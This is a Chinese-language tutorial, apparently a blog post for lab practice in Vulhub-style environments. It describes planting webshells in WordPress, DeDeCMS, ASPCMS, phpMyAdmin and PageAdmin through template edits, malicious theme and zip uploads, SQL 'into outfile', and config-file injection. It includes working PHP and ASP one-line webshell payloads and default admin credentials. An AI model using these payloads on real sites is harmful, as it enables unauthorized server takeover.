当前位置: 首页 > news >正文

常见CMS

一、WordPress

后台修改模板拿WebShell

进入Vulhub靶场并执行以下命令开启靶场。端口是8080。

cd vulhub-master/wordpress/pwnscriptum
docker-compose up -d

http://47.93.51.60:8080/wp-content/themes/twentyfifteen/404.php?cmd=phpinfo();

上传主题拿WebShell

去找一个主题下载好之后跟一个php文件(里面写的一句话木马)放一起之后压缩上传。

拼接下面的路径就访问到了

http://47.93.51.60:8080/wp-content/themes/主题名/php文件名

二、DeDeCMS

通过文件管理器上传WebShell

上传我们的一句话木马文件即可。

http://172.16.2.4/uploads/1.php

修改模板文件拿WebShell 

写入一句话木马。

http://172.16.2.4/index.php?cmd=phpinfo();

后台任意命令执行拿WebShell

在广告内容写入一句话木马。

拼接路径访问即可。

通过后台sql命令执行拿webshell

获取mysql路径,由此猜测网站绝对路径

select '<?php @eval($_GET[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/webshell.php'

 

三、ASPCMS

后台修改配置文件拿Shell

这里有权限问题就改wwwroot文件的权限。

进入后台,账号:admin,密码:123456

http://172.16.2.4/admin_aspcms/index.asp     //全新版本

开代理去抓包。 

%25><%25Eval(Request (chr(65)))%25><%25   //密码是a

访问下面的地址用工具连接即可。 

http://172.16.2.4/config/aspcms_config.asp

四、PhPMyadmin

通过日志文件拿Shell

利用mysql日志文件写shell.这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以改这个存放位置,并且可以修改它的后缀名,所以可以修改成php的后缀名就能获取⼀个webshell

导⼊导出拿WebShell

首先判断mysql位置

select "<?php @eval($_GET[a]);?>" into outfile 'D:/phpstudy_pro/WWW/2.php'
http://127.0.0.1/1.php?a=phpinfo();

五、Pageadmin

上传文件解压拿WebShell

上传一个压缩包,里面是1.asp,然后解压后,1.asp就在文件管理里面了。然后用工具去连。

http://www.dtcms.com/a/305642.html

相关文章:

  • 力扣54:螺旋矩阵
  • 华为昇腾NPU卡 文生视频[T2V]大模型WAN2.1模型推理使用
  • wordpress后台导出elementor自带询盘接收到的文件并可视化
  • 数字化转型-制造业未来蓝图:“超自动化”工厂
  • 官方接口创建外部群
  • YOLOv5u:无锚点检测的革命性进步
  • Android Emoji 全面解析:从使用到自定义
  • 原生微信小程序实现语音转文字搜索---同声传译
  • 【go】实现BMI计算小程序与GUI/WEB端实现
  • 如何使用 Apache Ignite 作为 Spring 框架的缓存(Spring Cache)后端
  • 华为昇腾×绿算全闪存缓存释放澎湃潜能
  • 如何使用 Conda 安装 Qiskit(详细教程)
  • android 性能优化
  • GitHub使用小记——本地推送、外部拉取和分支重命名
  • 外网访问文档编辑器Docsify(Windows版本),内网穿透技术应用简便方法
  • UnityHub Validation Failed下载编辑器错误,添加模块报错的解决方案
  • 【深度学习新浪潮】3D城市建筑多样化生产的研发进展调研
  • XTOM蓝光三维扫描仪:解锁中小尺寸复杂零件的高精度3D检测新境界
  • 基于 Amazon Bedrock 与 Anthropic Claude 3 智能文档处理方案:从扫描件提取到数据入库全流程实践
  • sqli-labs:Less-1关卡详细解析
  • 移动管家手机控车系统硬件安装与软件绑定设置
  • 轻松打造Unity小游戏AR体验
  • 5,Docker运行最新ultralytics-main教程
  • 解析非法获取计算机信息系统数据罪中的其他技术手段
  • 如何在出售Windows11/10/8/7前彻底清除电脑数据
  • 破茧 JDBC:MyBatis 在 Spring Boot 中的轻量实践录
  • Cockpit管理服务器
  • 通达OA服务器无公网IP网络,如何通过内网穿透实现外网远程办公访问OA系统
  • 记录Linux下ping外网失败的问题
  • Docker学习其一